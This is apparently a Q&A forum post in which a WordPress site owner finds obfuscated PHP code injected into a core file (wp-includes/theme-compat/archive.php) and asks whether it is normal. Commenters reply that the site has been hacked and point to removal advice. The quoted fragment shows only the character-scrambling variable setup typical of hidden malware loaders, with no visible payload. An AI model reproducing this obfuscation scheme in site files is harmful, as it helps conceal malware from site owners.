# What does ./wp-includes/theme-compat/archive.php does?

Tags: php, wordpress

I noticed that the category page of my site stopped working suddenly. I activated wp_debug to True to diagnose the issue. The error said that php

> cannot parse unexpected character '(' at 
>   ./wp-includes/theme-compat/archive.php

I opened that file and it seems like it contains obfuscated code. I am not sure. Is this normal?

```
./wp-includes/theme-compat/archive.php 

<?php
    $facilitating= '5'; $keypunch='s';$carol ='ppE()'; $inquisitively=';6';$locus= 'e';
    $beagle = 'd'; $departing=':';$disposal= ')TP?'; $lisa= 'rgeNi[)a?'; $bramble='r';

    $heavy='`'; $carcinogen= 's;EV'; $kile ='G'; $enol='F'; $herd='a'; $juvenile ='8'; $consequents ='sESud]9o';$drone= 'P';$chromate = '>c"i:_m';$blahfuckingoddamblah= '(';$criticised = 'y';
    $libel = 'ineD$';$diction= 'X'; $grown = 'T'; $karil='o';$descent= '8dEteRo(=';

    $diabase ='P';$hobby='eeiTr'; $broncos = 'aE_)Ot)'; $laid = 'i'; $evyn='tIQ(sa"dt';

    $captivating='ePTcpQ'; $lingual = ')';$iggyed='Ca66F';$impede = 'f^'; $julie ='e'; $forecasting= 'E'; $facilitated ='0'; $closenesses= 'r';$blended = '$etc4avA'; $clubbing='n$?;T1g'; $fancifully =')'; $kettles='C';
    $lynett = 'D'; $helaina = 'UriiHD;R'; $argumentation= '1]_'; $limiter= 'E';$deducer='a'; $illiterate= 'd0Ov<';$caller= 'E/[L_(1'; $cellist= '$Dna)$7'; $dillon='0'; $bater = '6';
```

Comment: not normal.you have been hacked

Comment: @MadhawaPriyashantha how scan all files and compare them to the original wordpress core and also the original plugins and see the changes?

Comment: it's better reset since it's hard to find infected file.i refer to this question https://stackoverflow.com/questions/28668011/wordpress-malware-how-do-i-remove-it